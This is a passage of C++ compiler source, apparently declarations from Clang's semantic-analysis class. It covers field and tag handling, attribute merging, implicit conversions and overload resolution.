Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform ODR-like check for C/ObjC when merging tag types from modules.
/// Differently from C++, actually parse the body and reject / error out
/// in case of a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities deteremines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final prirority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final vaue.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef UuidAsWritten, MSGuidDecl *GuidDecl);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true,
bool ConsiderRequiresClauses = true);
enum class AllowedExplicit {
/// Allow no explicit functions to be used.
None,
/// Allow explicit conversion functions but not explicit constructors.
Conversions,
/// Allow both explicit conversion functions and explicit constructors.
All
};
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
AllowedExplicit AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as
// this is used for diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this is a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit as a series of 'note's all template and non-templates identified by
// the expression Expr
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfSingleOverloadCandidate(Expr *E, DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfSingleOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConverion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
